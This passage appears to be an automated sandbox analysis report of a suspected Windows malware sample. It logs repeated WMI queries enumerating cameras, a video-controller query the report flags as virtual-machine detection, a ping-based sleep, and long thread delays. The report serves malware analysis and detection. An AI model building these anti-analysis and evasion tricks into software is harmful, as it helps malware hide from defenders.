                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                    Uses ping.exe to sleep
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeMemory allocated: 1240000 memory reserve | memory write watchJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeMemory allocated: 1B1F0000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeMemory allocated: 28F0000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeMemory allocated: 1AB10000 memory reserve | memory write watchJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 600000Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 599891Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 599781Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 599672Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 599563Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 599438Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 599328Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 599219Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 599099Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 3600000Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 598969Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 598859Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 598750Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 598641Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 598531Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 598422Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 598313Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 598188Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 598078Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 597969Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 597859Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 597739Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 597610Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 597485Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 597360Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 597235Jump to behavior
